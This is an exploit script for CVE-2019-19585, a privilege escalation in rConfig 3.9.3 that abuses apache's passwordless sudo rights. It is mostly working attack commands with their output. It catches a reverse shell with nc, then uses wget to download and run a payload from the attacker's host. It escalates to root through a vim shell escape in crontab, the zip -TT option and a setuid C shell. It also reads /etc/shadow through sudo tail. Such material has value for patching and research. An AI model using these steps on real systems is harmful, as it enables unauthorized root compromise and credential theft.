# Exploit Title: rConfig <= v3.9.3 - Privilege Escalation # Date: 07/11/2019 # CVE-2019-19585 # Exploit Author: vikingfr # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) # Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh # Version: tested v3.9.3 # Tested on: CentOS 7.7 # # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # # Reading the "rConfig 3.x Installation Instructions" (http://help.rconfig.com/gettingstarted/installation), we can notice 2 install scripts are used : # $ curl -O http://files.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla" # $ grep curl install_rConfig.sh # curl -O http://files.rconfig.com/downloads/scripts/centos7_install.sh -A "Mozilla" >> $LOGFILE 2>&1 # curl -O http://files.rconfig.com/downloads/scripts/centos6_install.sh -A "Mozilla" >> $LOGFILE 2>&1 # # Looking at the install scripts, we see that Apache is sudoer. # $ sed -n 131,148p centos7_install.sh # #SUDOERs Update # SUDOINSTALLMSG="Updating Sudoers File..." # echo $SUDOINSTALLMSG; # echo -ne '##### (33%\r)' # sleep 1 # echo -ne '############# (66%)\r' # sleep 1 # echo -ne '##########################(100%)\n' # echo "<<<< Start - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1 # # update sudoers for rconfig specific tasks # echo '### rConfig specific Apahce configuration' >> /etc/sudoers # echo 'apache ALL = (ALL) NOPASSWD: /usr/bin/crontab, /usr/bin/zip, /bin/chmod, /bin/chown, /usr/bin/whoami, /usr/bin/wc, /usr/bin/tail, /bin/rm' >> /etc/sudoers # echo 'Defaults:apache !requiretty' >> /etc/sudoers # cat /etc/sudoers >> $LOGFILE 2>&1 # echo -e "${green}Status: Sudoers Updated${reset}\n"; # echo "<<<< End - $SUDOINSTALLMSG >>>>" >> $LOGFILE 2>&1 # # So if an attacker got a web RCE / Apache shell access, privilege escalation can be done with multiples techniques. # # Example # $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081 # rconfig - CVE-2019-19509 - Web authenticated RCE # [+] Logged in successfully, triggering the payload... # [+] Check your listener ! # # $ nc -nvlp 8081 # listening on [any] 8081 ... # connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34470 # bash: no job control in this shell # bash-4.2$ # # bash-4.2$ wget http://192.168.43.245:8000/rconfig_lpe.sh # wget http://192.168.43.245:8000/rconfig_lpe.sh # bash-4.2$ chmod 700 rconfig_lpe.sh # bash-4.2$ ./rconfig_lpe.sh # # ./rconfig_lpe.sh # rConfig v3.9.3 - Privilege Escalation # id # uid=0(root) gid=0(root) groups=0(root) ########################### # LPE using crontab (ex : using vim) ########################### # bash-4.2$ sudo crontab -e # sudo crontab -e # ... # :set shell=/bin/sh # :shell # id # uid=0(root) gid=0(root) groups=0(root) ########################### # LPE using ZIP ########################### # bash-4.2$ touch /tmp/LPE.txt # bash-4.2$ sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #' # id # uid=0(root) gid=0(root) groups=0(root) echo "rConfig v3.9.3 - Privilege Escalation" touch /tmp/LPE.txt sudo zip -q /tmp/LPE.zip /tmp/LPE.txt -T -TT '/bin/sh #' ########################### # LPE using chmod / chown ########################### # bash-4.2$ cd /tmp # bash-4.2$ echo 'int main() { setresuid(0,0,0); system("/bin/sh"); }' > privshell.c # bash-4.2$ gcc -o privshell privshell.c # bash-4.2$ rm privshell.c # bash-4.2$ sudo chown root:root /tmp/privshell # bash-4.2$ sudo chmod u+s /tmp/privshell # bash-4.2$ ./privshell # id # uid=0(root) gid=48(apache) groups=48(apache) ########################### # FILE READ using TAIL ########################### #bash-4.2$ sudo tail -22 /etc/shadow #sudo tail -22 /etc/shadow #root:$6$Jhxxxxxxxxxxxxxxxxxxx8/:18208:0:99999:7::: #bin:*:17834:0:99999:7::: #daemon:*:17834:0:99999:7::: # ... # EOF